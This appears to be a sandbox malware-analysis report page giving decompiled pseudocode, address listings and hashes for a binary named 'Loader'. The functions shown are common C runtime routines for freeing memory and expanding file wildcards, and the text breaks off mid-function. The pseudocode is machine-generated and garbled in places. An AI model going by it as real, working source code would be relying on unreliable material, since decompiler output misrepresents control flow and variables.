0x00000000
0x00af79ed
0x00af79c7
0x00af79cc
0x00af79d0
0x00000000
0x00000000
0x00af79d2
0x00000000
0x00af79d2
0x00af797d
0x00af7982
0x00000000
0x00000000
0x00af798a
0x00000000
0x00000000
0x00af79a6
0x00af79aa
0x00000000
0x00000000
0x00000000
0x00af79b0
0x00af78ff
0x00af791a
0x00af791f
0x00af792a
0x00af792a
0x00000000
0x00af792a
0x00af7921
0x00af7927
0x00af7927
0x00000000
0x00af7927
0x00af7901
0x00af7906
0x00af790a
0x00000000
0x00000000
0x00af790c
0x00000000
0x00af790c

APIs

__alloca_probe_16.LIBCMT ref: 00AF7901
__alloca_probe_16.LIBCMT ref: 00AF79C7
__freea.LIBCMT ref: 00AF7A33

Part of subcall function 00AF548F: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,00AE9ED7,00000002,00000000,?,?,?,00AE1D2E,00000001,00000004), ref: 00AF54C1

__freea.LIBCMT ref: 00AF7A3C
__freea.LIBCMT ref: 00AF7A5F

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: a5bdcb32af50e99a073accced9b1a933c0683c0de393634e0ade0802982b72f7
Instruction ID: cf8bd249440a979d6c7dbed08ade24431fd191dbde9f245ff36823ce7fa7a5c2
Opcode Fuzzy Hash: a5bdcb32af50e99a073accced9b1a933c0683c0de393634e0ade0802982b72f7
Instruction Fuzzy Hash: 3C51C37250421EAFEF21AFE5CD81EBF36AAEF44790F264129FE0497140EB71DD5186A0

Uniqueness

Uniqueness Score: -1.00%

Function 00AFD6C4 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00AFD6C4(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xb36bf0; // 0xb36c44
					if(_t23 != 0) {
						E00AF4AEF(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xb36bf4; // 0xb38240
					if(_t24 != 0) {
						E00AF4AEF(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xb36bf8; // 0xb38240
					if(_t25 != 0) {
						E00AF4AEF(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xb36c20; // 0xb36c48
					if(_t26 != 0) {
						E00AF4AEF(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xb36c24; // 0xb38244
					if(_t27 != 0) {
						return E00AF4AEF(_t6);
					}
				}
				return _t6;
			}

0x00afd6ca
0x00afd6cf
0x00afd6d3
0x00afd6d9
0x00afd6dc
0x00afd6e1
0x00afd6e5
0x00afd6eb
0x00afd6ee
0x00afd6f3
0x00afd6f7
0x00afd6fd
0x00afd700
0x00afd705
0x00afd709
0x00afd70f
0x00afd712
0x00afd717
0x00afd718
0x00afd71b
0x00afd721
0x00000000
0x00afd729
0x00afd721
0x00afd72c

APIs

_free.LIBCMT ref: 00AFD6DC

Part of subcall function 00AF4AEF: RtlFreeHeap.NTDLL(00000000,00000000,?,00AFD965,?,00000000,?,00000002,?,00AFDC08,?,00000007,?,?,00AFE0FB,?), ref: 00AF4B05
Part of subcall function 00AF4AEF: GetLastError.KERNEL32(?,?,00AFD965,?,00000000,?,00000002,?,00AFDC08,?,00000007,?,?,00AFE0FB,?,?), ref: 00AF4B17

_free.LIBCMT ref: 00AFD6EE
_free.LIBCMT ref: 00AFD700
_free.LIBCMT ref: 00AFD712
_free.LIBCMT ref: 00AFD724

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e59d4a576833f96dd83727ea4a44c7bca8d4ea2ead246f01128227b3bd50c6e5
Instruction ID: eab012d534cd6bc6355d4b327510a9d374636a4d969daff994ebf4eb76e6bb29
Opcode Fuzzy Hash: e59d4a576833f96dd83727ea4a44c7bca8d4ea2ead246f01128227b3bd50c6e5
Instruction Fuzzy Hash: 80F01236544208B7C621FBF9E5C6C2BB7DAEA087507645805F659DB551EF30FC804A68

Uniqueness

Uniqueness Score: -1.00%

Function 00AFBC15 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00AFBC15(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E00AF1849(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E00B016DE(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E00AED26C();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E00AF4A92(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E00B016DE(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E00AFC148(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E00AF4AEF(_t300);
														_t302 = _v12;
													}
													E00AF4AEF(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E00B016DE(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00AED26C();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0xb36bac; // 0x85d5fe2b
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E00B025F0(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E00AF0F6B(_t244 - _t287 + 1, _t287,  &_v676, E00AFB96A(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E00AFBB46( &(_v608.cFileName),  &_v640,  &_v609, E00AFB96A(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E00AF4AEF(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E00AF4AEF(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E00B020C0(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E00AFBB2E);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E00AF4AEF(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E00AE95ED(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E00AF4AEF(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E00B025B0(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E00AF4AEF( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E00AF4AEF(_t283);
						goto L31;
					}
				} else {
					_t219 = E00AEF21B(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E00AED23F();
					L31:
					return _t297;
				}
				L81:
			}

0x00afbc1a
0x00afbc1d
0x00afbc20
0x00afbc21
0x00afbc23
0x00afbc39
0x00afbc3d
0x00afbc40
0x00afbc42
0x00afbc44
0x00afbc46
0x00afbc48
0x00afbc4b
0x00afbc4e
0x00afbc51
0x00afbc53
0x00afbcb6
0x00afbcb8
0x00afbcbb
0x00afbcbd
0x00afbcc1
0x00afbcca
0x00afbccb
0x00afbcce
0x00afbcd0
0x00afbcd3
0x00afbcd7
0x00afbcd7
0x00afbcd9
0x00afbcdb
0x00afbcdd
0x00afbcdf
0x00afbcdf
0x00afbce1
0x00afbce4
0x00afbce7
0x00afbce7
0x00afbce9
0x00afbcea
0x00afbcea
0x00afbcf5
0x00afbcf7
0x00afbcfa
0x00afbcfb
0x00afbcfe
0x00afbcfe
0x00afbd02
0x00afbd05
0x00afbd08
0x00afbd08
0x00afbd08
0x00afbd15
0x00afbd17
0x00afbd1a
0x00afbd1c
0x00afbd34
0x00afbd37
0x00afbd3a
0x00afbd3c
0x00afbd3f
0x00afbd41
0x00afbd44
0x00afbd47
0x00afbda4
0x00afbda7
0x00afbdaa
0x00afbdac
0x00000000
0x00afbd49
0x00afbd4b
0x00afbd4b
0x00afbd4d
0x00afbd50
0x00afbd50
0x00afbd52
0x00afbd54
0x00afbd5a
0x00afbd5d
0x00afbd5d
0x00afbd5f
0x00afbd60
0x00afbd60
0x00afbd67
0x00afbd6a
0x00afbd6e
0x00afbd7b
0x00afbd80
0x00afbd83
0x00afbd85
0x00afbdf9
0x00afbdfa
0x00afbdfb
0x00afbdfc
0x00afbdfd
0x00afbdfe
0x00afbe03
0x00afbe07
0x00afbe09
0x00afbe0a
0x00afbe0d
0x00afbe0d
0x00afbe10
0x00afbe10
0x00afbe12
0x00afbe13
0x00afbe13
0x00afbe17
0x00afbe18
0x00afbe1f
0x00afbe22
0x00afbe25
0x00afbe27
0x00afbe2f
0x00afbe30
0x00afbe31
0x00afbe34
0x00afbe3e
0x00afbe42
0x00afbe44
0x00afbe58
0x00afbe58
0x00afbe5b
0x00afbe65
0x00afbe6a
0x00afbe6d
0x00afbe6f
0x00000000
0x00afbe71
0x00afbe71
0x00afbe76
0x00afbe7d
0x00afbe80
0x00afbe82
0x00afbe93
0x00afbe95
0x00afbe97
0x00afbe97
0x00afbe97
0x00afbe84
0x00afbe85
0x00afbe8a
0x00afbe8d
0x00afbe9c
0x00afbea2
0x00000000
0x00afbea5
0x00afbe46
0x00afbe46
0x00afbe4c
0x00afbe51
0x00afbe54
0x00afbe56
0x00afbea8
0x00afbeaa
0x00afbeab
0x00afbeac
0x00afbead
0x00afbeae
0x00afbeaf
0x00afbeb4
0x00afbeb7
0x00afbeb8
0x00afbeba
0x00afbec0
0x00afbec7
0x00afbeca
0x00afbecd
0x00afbed0
0x00afbed1
0x00afbed2
0x00afbed5
0x00afbedb
0x00afbedd
0x00afbedf
0x00afbedf
0x00afbee1
0x00afbee3
0x00000000
0x00000000
0x00afbee5
0x00afbee7
0x00afbee9
0x00afbeeb
0x00afbef6
0x00afbef8
0x00afbefa
0x00000000
0x00000000
0x00afbefa
0x00afbeeb
0x00000000
0x00afbee7
0x00afbefc
0x00afbefc
0x00afbf02
0x00afbf04
0x00afbf0a
0x00afbf0c
0x00afbf2e
0x00afbf2e
0x00afbf30
0x00afbf32
0x00afbf3e
0x00afbf3e
0x00afbf34
0x00afbf34
0x00afbf36
0x00000000
0x00afbf38
0x00afbf38
0x00afbf3a
0x00afbf3c
0x00000000
0x00000000
0x00afbf3c
0x00afbf36
0x00afbf46
0x00afbf4e
0x00afbf54
0x00afbf55
0x00afbf57
0x00afbf5f
0x00afbf65
0x00afbf6b
0x00afbf71
0x00afbf85
0x00afbf8a
0x00afbf95
0x00afbfa5
0x00afbfab
0x00afbfad
0x00afbfb0
0x00afbfd3
0x00afbfd3
0x00afbfd8
0x00afbfde
0x00afbfde
0x00afbfe4
0x00afbfea
0x00afbff0
0x00afbff6
0x00afbffc
0x00afc01d
0x00afc022
0x00afc027
0x00afc02b
0x00afc031
0x00afc034
0x00afc047
0x00afc047
0x00afc04d
0x00afc053
0x00afc054
0x00afc055
0x00afc05a
0x00afc05d
0x00afc063
0x00afc065
0x00afc0c3
0x00afc0c9
0x00afc0d1
0x00afc0d6
0x00afc0dc
0x00afc0dd
0x00000000
0x00000000
0x00000000
0x00afc036
0x00afc036
0x00afc039
0x00afc03b
0x00000000
0x00afc03d
0x00afc03d
0x00afc040
0x00000000
0x00afc042
0x00afc042
0x00afc045
0x00000000
0x00000000
0x00000000
0x00000000
0x00afc045
0x00afc040
0x00afc03b
0x00afc0df
0x00afc0e0
0x00000000
0x00afc067
0x00afc067
0x00afc06d
0x00afc075
0x00afc07a
0x00afc089
0x00afc089
0x00afc091
0x00afc097
0x00afc09d
0x00afc0a4
0x00afc0a7
0x00afc0a9
0x00afc0b9
0x00afc0be
0x00000000
0x00afbfb2
0x00afbfb2
0x00afbfb8
0x00afbfb9
0x00afbfba
0x00afbfbb
0x00afbfc3
0x00afbfc3
0x00afc0e6
0x00afc0e6
0x00afc0ed
0x00afc0ee
0x00afc0f6
0x00afc0fb
0x00afc0fc
0x00afbf0e
0x00afbf0e
0x00afbf11
0x00afbf13
0x00afbf28
0x00000000
0x00afbf15
0x00afbf15
0x00afbf18
0x00afbf19
0x00afbf1a
0x00afbf1b
0x00afbf20
0x00afbf13
0x00afc101
0x00afc102
0x00afc104
0x00afc10b
0x00000000
0x00000000
0x00000000
0x00afbe56
0x00afbe29
0x00afbe2b
0x00afbe2c
0x00afbe2e
0x00afbe2e
0x00000000
0x00000000
0x00000000
0x00000000
0x00afbd87
0x00afbd87
0x00afbd8d
0x00afbd90
0x00afbd93
0x00afbd96
0x00afbd99
0x00afbd9c
0x00afbd9f
0x00afbd9f
0x00000000
0x00afbd50
0x00afbd1e
0x00afbd1e
0x00afbd21
0x00afbdae
0x00afbdaf
0x00afbdb4
0x00000000
0x00afbdb4
0x00afbc55
0x00afbc55
0x00afbc58
0x00afbc60
0x00afbc63
0x00afbc6a
0x00afbc6c
0x00afbc6e
0x00afbc89
0x00afbc8a
0x00afbc8b
0x00afbc8c
0x00afbc91
0x00afbc94
0x00afbc97
0x00afbc70
0x00afbc70
0x00afbc73
0x00afbc74
0x00afbc75
0x00afbc76
0x00afbc77
0x00afbc7c
0x00afbc7e
0x00afbc81
0x00afbc81
0x00afbc99
0x00afbc9b
0x00000000
0x00000000
0x00afbca4
0x00afbca7
0x00afbcaa
0x00afbcac
0x00afbcae
0x00000000
0x00afbcb0
0x00afbcb0
0x00afbcb3
0x00000000
0x00afbcb3
0x00000000
0x00afbcae
0x00afbd29
0x00afbdb5
0x00afbdb8
0x00afbdbc
0x00afbdc5
0x00afbdc8
0x00afbdcc
0x00afbdcc
0x00afbdce
0x00afbdd1
0x00afbdd3
0x00afbdd5
0x00afbdd7
0x00afbddc
0x00afbddd
0x00afbde1
0x00afbde1
0x00afbde5
0x00afbde8
0x00afbde8
0x00afbdec
0x00000000
0x00afbdf3
0x00afbc25
0x00afbc25
0x00afbc2c
0x00afbc2d
0x00afbc2f
0x00afbdf4
0x00afbdf8
0x00afbdf8
0x00000000

APIs

_free.LIBCMT ref: 00AFBDAF

Strings

*?, xrefs: 00AFBC58

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: a57ecd3e8aa15100dfe1a1c8c72cde4bbb3cc578dafd45ae0aef1a1cb961eb08
Instruction ID: 9030638d97681972519437761da254063b89693c81b640016ad8f1501d299f7d
Opcode Fuzzy Hash: a57ecd3e8aa15100dfe1a1c8c72cde4bbb3cc578dafd45ae0aef1a1cb961eb08
Instruction Fuzzy Hash: 0B613AB5E1021D9FDB14DFA9C8815EEFBF5EF48310B24816AE915E7340D731AE418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AF159F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00AF159F(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E00AFC85A(_t48);
						E00AFC2A1(_t48, _t57, 0, 0xb383b8, 0, 0xb383b8, 0x104);
						_t26 =  *0xb384ec; // 0x7c23e8
						 *0xb384dc = 0xb383b8;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0xb383b8;
							_v20 = 0xb383b8;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E00AF1849(E00AF16D5( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E00AF16D5( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E00AFC1CF(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0xb384e0 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0xb384e4 = _t58;
											L18:
											E00AF4AEF(_t37);
											_v12 = 0;
											L19:
											E00AF4AEF(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
